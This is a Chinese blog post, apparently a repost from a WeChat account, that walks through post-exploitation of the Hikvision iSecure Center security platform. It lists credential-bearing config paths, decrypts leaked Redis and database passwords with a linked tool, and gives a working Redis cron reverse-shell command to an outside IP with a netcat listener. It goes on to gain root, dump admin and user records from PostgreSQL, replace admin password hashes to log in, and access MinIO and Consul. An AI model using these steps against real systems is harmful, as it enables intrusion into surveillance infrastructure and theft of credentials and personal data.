海康综合安防平台深度利用

admin 2024年11月4日13:50:54评论57 views字数 3953阅读13分10秒阅读模式

一、前言

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。

HIKVISION iSecure Center 综合安防管理平台已暴露出多项漏洞,然而网上的相关文章大多只介绍了如何复现漏洞,通常在漏洞复现后就没有进一步深入。事实上,在很多情况下,我们需要通过这些漏洞深入挖掘,以获取更多数据、信息和权限。在这篇博文中,我将介绍如何对海康漏洞进行深度利用,最大化漏洞的潜在价值。

二、可深度利用的漏洞

不是所有的海康综合安防平台的漏洞都可以深度的去利用,但也从目前爆出来的漏洞大多数都可以进行深度利用,能够深度利用的漏洞有哪些呢。

  • 1.任意文件读取漏洞
  • 2.敏感文件泄露(部分)
  • 3.文件上传漏洞
  • 4.远程代码执行漏洞

在我们深度利用这些漏洞都有一个思路,拿shell获取配置文件再通过配置文件获取数据以及其他的服务权限,像任意文件读取漏洞和敏感文件泄露这两个漏洞虽然不能直接拿到shell但是我们一样可以通过配置文件去拿shell。大概的思路就是如下的图,有其他思路的大佬可以补充一下。

海康综合安防平台深度利用

海康综合安防平台大部分配置文件路径:

1. /opt/hikvision/web/components/ntp.1/conf/config.propertiesNTP 服务:网络时间协议 (NTP) 的配置文件,用于时间同步。可能包含 NTP 服务器的认证信息。2. /opt/hikvision/web/components/activemq514linux64.1/conf/config.propertiesActiveMQ:消息队列服务的配置文件。可能包含用于连接 ActiveMQ 服务的用户名和密码。3. /opt/hikvision/web/components/cluster.1/conf/config.propertiesCluster:集群配置文件,用于管理多台服务器的集群。可能包含集群管理的认证信息。4. /opt/hikvision/web/components/lm.1/conf/config.propertiesLicense Manager:许可证管理服务的配置文件。可能包含用于连接许可证服务器的用户名和密码。5. /opt/hikvision/web/components/ls.1/conf/config.propertiesLogging Service:日志服务的配置文件。可能包含用于连接日志服务器的认证信息。6. /opt/hikvision/web/components/lsm.1/conf/config.propertiesLicense Server Manager:许可证服务器管理服务的配置文件。可能包含用于连接许可证服务器的用户名和密码。7. /opt/hikvision/web/components/mps.1/conf/config.propertiesMedia Processing Service:媒体处理服务的配置文件。可能包含用于连接媒体处理服务的用户名和密码。8. /opt/hikvision/web/components/nodejslinux64.1/conf/config.propertiesNode.js:Node.js 环境的配置文件。可能包含 Node.js 应用的配置和认证信息。9. /opt/hikvision/web/components/openjdk11linux64.1/conf/config.propertiesOpenJDK:Java 环境的配置文件。可能包含 Java 应用的配置和认证信息。10. /opt/hikvision/web/components/postgresql11linux64.1/conf/config.propertiesPostgreSQL:PostgreSQL 数据库的配置文件。通常包含数据库的连接信息,包括用户名和密码。11. /opt/hikvision/web/components/redislinux64.1/conf/config.propertiesRedis:Redis 数据库的配置文件。通常包含 Redis 的连接信息,包括认证密码。12. /opt/hikvision/web/components/reportservice.1/conf/config.propertiesReport Service:报表服务的配置文件。可能包含用于连接报表服务的认证信息。13. /opt/hikvision/web/components/svm.1/conf/config.propertiesService Virtual Machine:服务虚拟机的配置文件。可能包含虚拟机服务的配置和认证信息。14. /opt/hikvision/web/components/tomcat85linux64.1/conf/config.propertiesTomcat:Tomcat Web 服务器的配置文件。通常包含用于管理 Tomcat 服务器的用户名和密码。

三、综合安防平台的服务

在我们利用海康综合安防平台的漏洞时我们需要先大概了解一下常见的海康综合平台的服务,还有许多的服务和可利用的服务在这里就不一一列举了。

  • 前台登陆平台

海康综合安防平台深度利用

  • 后台登陆平台

海康综合安防平台深度利用

  • minio

海康综合安防平台深度利用

  • ActiveMQ
  • Consul by HashiCorp

海康综合安防平台深度利用

四、后渗透过程

在这里我就以海康综合安防平台一个敏感信息泄露为例,给搭建演示一下海康综合安防平台深度利用以及怎么一步步拿到海康所有服务的权限。

1.前台登陆平台

1.使用海康综合安防平台config.properties信息泄漏漏洞,在这里我们可以找到Redis端口密码以及一个权限较低的数据库账户密码,但是这里的密码都是加密的。

/portal/conf/config.properties

海康综合安防平台深度利用

2.在这里我们使用GitHub一位大佬写的解密程序分别对Redis密码和数据库账户密码进行解码。(解密工具放在文章最后了)

海康综合安防平台深度利用

海康综合安防平台深度利用

3.使用我们解密后的数据库密码进行登录数据库,但是里面的数据几乎没有权限去查看。(再后面的步骤会获取到最高权限账户)海康综合安防平台深度利用

海康综合安防平台深度利用

4.再使用我们破解出来的密码登陆Redis,我们拿到了redis可以使用redis去反弹我们的shell或者给ssh写密钥。(我这里shh写密钥没有成功)。

海康综合安防平台深度利用

海康综合安防平台深度利用

5.先开启我们的端口监听,然后再用Redis去反弹我们的shell。(反弹大概1分钟左右就能弹回来)

 nc -lvp 8089

海康综合安防平台深度利用

set x "n* * * * * bash -i >& /dev/tcp/10.100.123.107/8089 0>&1n"config set dir /var/spool/cron/config set dbfilename rootsave

海康综合安防平台深度利用

海康综合安防平台深度利用

6.我们服务器的root权限接下来可以进行内网渗透以及其他的操作,这里我只演示海康综合安防平台的深度利用,我们先读取前台的配置文件里面的数据库账户信息。(解密工具放在文章最后了)

/opt/hikvision/web/components/postgresql11linux64.1/conf/config.propertiespython -m SimpleHTTPServer 

这里我直接读取内容显示不全,我切换到对应的目录启动一个python服务把文件下载下来查看(解密工具放在文章最后了)

海康综合安防平台深度利用

python -m SimpleHTTPServer 8085

海康综合安防平台深度利用

海康综合安防平台深度利用

这个密码就是数据库的最高权限密码

海康综合安防平台深度利用

海康综合安防平台深度利用

使用postgres用户名进行登录

海康综合安防平台深度利用

7.在这个表里面记录了前台登陆的管理员账户密码以及大量普通的用户数据

海康综合安防平台深度利用

默认只能查询1000条数据,可能管理员没在这1000条数据里面,我们要修改一下查询的数量。

海康综合安防平台深度利用

海康综合安防平台深度利用

海康综合安防平台深度利用

8. 我们在使用我们解密时候的工具生成一个账号密码替换管理员账号密码(一定要备份原来的密码和盐,替换后登陆上去马上替换回去)(解密工具放在文章最后了)

海康综合安防平台深度利用

使用我们替换后的密码登陆成功

海康综合安防平台深度利用

2.后台登陆平台

9.用同样6-8的方法步骤我们再来获取后台登陆运行管理中心的权限。(这里就省略重复多余步骤)

/opt/hikvision/web/opsMgrCenter/conf/config.properties

海康综合安防平台深度利用

海康综合安防平台深度利用

海康综合安防平台深度利用

center_user表里面就是存放管理员的账号密码

海康综合安防平台深度利用

这里自己添加的账号密码也可以登陆但是还是没有sysadmin的权限高,但是权限也足够使用了,我们也也有还是像上面替换管理员的账号密码。

海康综合安防平台深度利用

海康综合安防平台深度利用

3.minio

这里我们直接进入配置文件解密我们的密码就可以登陆了

/opt/hikvision/web/components/minio.1/conf/config.properties

海康综合安防平台深度利用

海康综合安防平台深度利用

海康综合安防平台深度利用

4.ActiveMQ

这里我的ActiveMQ的服务没有开放

/opt/hikvision/web/components/activemq514linux64.1/conf/config.properties

海康综合安防平台深度利用

海康综合安防平台深度利用

5.Consul by HashiCorp

Consul by HashiCorp是一个未授权的访问,有时候还能翻到一些账号密码等信息。

海康综合安防平台深度利用

海康综合安防解密工具

https://github.com/wafinfo/Hikvision

原文始发于微信公众号(菜鸟学渗透):海康综合安防平台深度利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月4日13:50:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康综合安防平台深度利用https://cn-sec.com/archives/3353063.html

发表评论

匿名网友 填写信息